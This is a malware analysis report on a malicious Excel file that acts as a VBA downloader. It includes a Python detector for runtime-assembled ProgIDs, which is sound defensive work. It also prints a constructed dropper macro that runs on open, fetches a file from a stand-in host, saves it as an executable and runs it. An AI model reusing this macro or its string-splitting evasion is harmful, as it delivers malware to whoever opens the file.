Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 1b213019cb5bf312…

MALICIOUS

Office (OLE) / .XLS

Size: 84.5 KB
Created: 2022-08-09 11:01:09
Authoring application: Microsoft Excel
First seen: 2022-08-31
MD5: b4092af9867a42164d2df1a8041ce372
SHA-1: edbd113eee982b3e90a6ba1af825c31a4d05fd55
SHA-256: 1b213019cb5bf3126ab451025c85a5a7f62640660d99b8cb4f5227b86c897927
Risk score: 160

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1105 Ingress Tool Transfer

The critical heuristic OLE_VBA_HTTP_DROP_EXEC indicates that the VBA macros in this XLS file read an HTTP response body and write it to disk (ADODB.Stream SaveToFile), in combination with auto-exec entry points and Shell calls. Together with the CreateObject/GetObject calls, this strongly suggests downloader/dropper functionality: the document fetches a secondary payload from the internet, saves it to disk and executes it. The heuristic fires even when the COM ProgIDs are assembled at runtime to evade keyword scanning. No specific malware family could be identified, but the behavior is consistent with common malware delivery techniques.

Heuristics (4)

  • [critical] OLE_VBA_HTTP_DROP_EXEC: VBA downloads and writes a file to disk
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-and-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  • [high] OLE_VBA_CREATEOBJ: CreateObject call
    The macro instantiates COM objects by ProgID via CreateObject. This is the usual way VBA obtains an HTTP client, a file stream or a shell object, so the ProgIDs passed to it (including ones assembled from string fragments or Chr() calls) are the key detail to recover.
  • [high] OLE_VBA_GETOBJ: GetObject call
    The macro calls GetObject, which returns a reference to an already running or moniker-addressed COM object and serves the same purposes as CreateObject.
  • [medium] OLE_VBA_MACROS: VBA macros detected
    The document contains VBA macro code.
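The following is an added example of how the download-and-drop pattern described by the heuristics above can be recognised in decoded VBA source, including the case where the COM ProgIDs are assembled at runtime from string fragments and Chr() calls. It is not the analysis engine that produced this report and it does not use the real sample; the two VBA snippets inside it are constructed for illustration (one dropper-style macro, one benign formatting macro), and the function names (fold_strings, resolve_vars, analyse) and the verdict labels are hypothetical.

```python
"""Flag VBA that downloads a file over HTTP, writes it to disk and executes it.

Added example: constructed inputs, hypothetical function names. Run a real
sample through olevba first and feed the decoded source to analyse()."""
import re

# ProgIDs typically used for the HTTP leg, the write-to-disk leg and execution.
HTTP_PROGIDS = ("msxml2.xmlhttp", "msxml2.serverxmlhttp",
                "winhttp.winhttprequest", "microsoft.xmlhttp")
STREAM_PROGIDS = ("adodb.stream", "scripting.filesystemobject")
SHELL_PROGIDS = ("wscript.shell", "shell.application")
AUTOEXEC_RE = re.compile(
    r"\bSub\s+(Workbook_Open|Auto_Open|Document_Open|AutoOpen|Workbook_Activate)\b", re.I)


def fold_strings(src: str) -> str:
    """Collapse Chr() calls and literal concatenation so that a ProgID built as
    "MSX" & "ML2." & Chr(88) & "MLHTTP" becomes the plain literal "MSXML2.XMLHTTP"."""
    # Chr(88) / Chr$(88) -> "X"; Chr(34) is a quote, which VBA writes as "" inside a literal.
    src = re.sub(r"\bChr\$?\(\s*(\d+)\s*\)",
                 lambda m: '"' + ('""' if int(m.group(1)) == 34 else chr(int(m.group(1)))) + '"',
                 src)
    # "abc" & "def" -> "abcdef", also across a VBA line continuation (" _" + newline).
    join = re.compile(r'"\s*[&+]\s*(?:_\s*\r?\n\s*)?"')
    prev = None
    while prev != src:          # repeat until no adjacent literals are left
        prev, src = src, join.sub("", src)
    return src


def resolve_vars(src: str) -> str:
    """Substitute single-literal string assignments (p = "...") into CreateObject(p)/GetObject(p)."""
    assigns = dict(re.findall(r'^\s*(\w+)\s*=\s*"([^"\n]*)"\s*$', src, re.M))

    def sub(m):
        name = m.group(2)
        return f'{m.group(1)}("{assigns[name]}")' if name in assigns else m.group(0)

    return re.sub(r"\b(CreateObject|GetObject)\(\s*(\w+)\s*\)", sub, src, flags=re.I)


def analyse(vba: str) -> dict:
    """Return the indicators found and a verdict: critical, suspicious or clean."""
    src = resolve_vars(fold_strings(vba))
    low = src.lower()
    ind = {
        "auto_exec": bool(AUTOEXEC_RE.search(src)),
        "createobject": "createobject(" in low,
        "getobject": "getobject(" in low,
        "http_client": any(p in low for p in HTTP_PROGIDS),
        "http_response": ".responsebody" in low or ".responsetext" in low,
        "write_to_disk": ".savetofile" in low or ".createtextfile(" in low,
        # Shell as a statement/function, but not the "shell" inside WScript.Shell.
        "exec": bool(re.search(r'(?<![.\w])shell\s*[("\w]', low)
                     or re.search(r'\.(run|exec)\s*[("\w]', low)),
    }
    progids = sorted(p for p in HTTP_PROGIDS + STREAM_PROGIDS + SHELL_PROGIDS if p in low)
    if ind["http_response"] and ind["write_to_disk"] and (ind["auto_exec"] or ind["exec"]):
        verdict = "critical"        # the OLE_VBA_HTTP_DROP_EXEC shape: fetch, save, run
    elif ind["http_client"] or ind["write_to_disk"]:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"verdict": verdict, "indicators": ind, "progids": progids}


# Constructed sample: dropper-style macro with ProgIDs assembled at runtime.
DROPPER_VBA = r'''
Private Sub Workbook_Open()
    Dim h As Object, s As Object
    Dim p1 As String
    p1 = "MSX" & "ML2." & Chr(88) & "MLHTTP"
    Set h = CreateObject(p1)
    h.Open "GET", "http://example.invalid/update.dat", False
    h.Send
    If h.Status = 200 Then
        Set s = CreateObject("ADO" & "DB.Stream")
        s.Type = 1
        s.Open
        s.Write h.responseBody
        s.SaveToFile Environ("TEMP") & "\upd.exe", 2
        s.Close
        Shell Environ("TEMP") & "\upd.exe", vbHide
    End If
End Sub
'''

# Constructed sample: benign macro that only formats a worksheet.
BENIGN_VBA = '''
Sub FormatReport()
    Range("A1:D1").Font.Bold = True
    Columns("A:D").AutoFit
End Sub
'''

if __name__ == "__main__":
    for name, code in (("dropper", DROPPER_VBA), ("benign", BENIGN_VBA)):
        r = analyse(code)
        print(name, r["verdict"], r["progids"])
```

The folding step is what makes the detector resistant to the evasion the heuristic text mentions: without it, a scanner looking for the literal string "MSXML2.XMLHTTP" sees only "MSX", "ML2." and a Chr() call. The verdict deliberately requires all three legs (HTTP response read, SaveToFile, and an auto-exec or Shell path) before reporting critical, so a macro that only fetches data, or only writes a file, is reported as suspicious rather than as a dropper.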

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename   | Kind      | Source                                              | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3832 bytes
SHA-256 (macros.bas): 52f68457c7a42f4b6ac3025d01c3b79465fc6131294018141cb45528bc3cf788